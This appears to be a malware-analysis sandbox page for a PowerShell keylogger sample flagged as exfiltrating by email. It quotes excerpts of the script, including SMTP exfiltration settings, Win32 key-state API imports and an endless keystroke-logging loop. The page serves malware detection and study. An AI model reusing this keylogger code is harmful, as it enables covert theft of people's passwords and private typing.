Hostile 92% Download

VirusShare_9cb821e1af47b6174a18ac509db920b3

Keylogger exfiltrates via email

Detects PowerShell PoshKeyloggerCode embeds unconditional PowerShell loop
SHA-256d602fe9a12b60d3854d1f4b6a078f346ca0ba6da8312050d22c5bc29e037a4b0

Evidence

Microsoft consumer email domain suffix lines 1–19
1# variable globales
2#$Path = "$env:temp\"
3$Path = "D:\Paris\sandBox"
4$ServeurSMTP = "smtp.free.fr"
5$AdrFrom = "[email protected]"
6$AdrTo = "[email protected]"
7
8
9function ecouteClavier() {
10
11 # Signatures for API Calls
12 $signatures = @'
13[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
14public static extern short GetAsyncKeyState(int virtualKeyCode);
15[DllImport("user32.dll", CharSet=CharSet.Auto)]
16public static extern int GetKeyboardState(byte[] keystate);
17[DllImport("user32.dll", CharSet=CharSet.Auto)]
18public static extern int MapVirtualKey(uint uCode, int uMapType);
19[DllImpo …
PowerShell compiles inline .NET member code lines 20–26
20:130… uff, uint wFlags);
21'@
22
23 # load signatures and make members available
24 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
25
26 $PathTouchesTapees = "$Path\touchetapees_" + "$((get-date).tostring('yyy …
Code embeds unconditional PowerShell loop lines 29–59
29:28… $PathTouchesTapees -ItemType File -Force
30
31 try {
32 #Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
33
34 # create endless loop. When user presses CTRL+C, finally-block
35 # executes and shows the collected key presses
36 while ($true) {
37 Start-Sleep -Milliseconds 40
38
39 # scan all ASCII codes above 8
40 for ($ascii = 9; $ascii -le 254; $ascii++) {
41 # get current key state
42 $state = $API::GetAsyncKeyState($ascii)
43
44 # is key pressed?
45 if ($state -eq -32767) {
46 $null = [console]::CapsLock
47
48 # translate scan code to real code
49 $virtualKey = $API::MapVirtualKey($ascii, 3)
50
51 # get keyboard state for virtual keys
52 $kbstate = New-Object -TypeName Byte[] -ArgumentList 256
53 $checkkbstate = $API::GetKeyboardState($kbstate)
54
55 # prepare a StringBuilder to receive input key
⋯4 lines
Detects PowerShell PoshKeylogger lines 59–74
59:95… .Capacity, 0)
60
61 if ($success) {
62 # add key to logger file
63 [System.IO.File]::AppendAllText($PathTouchesTapees, $mychar, [System.Text.Encoding]::Unicode)
64 }
65 }
⋯9 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.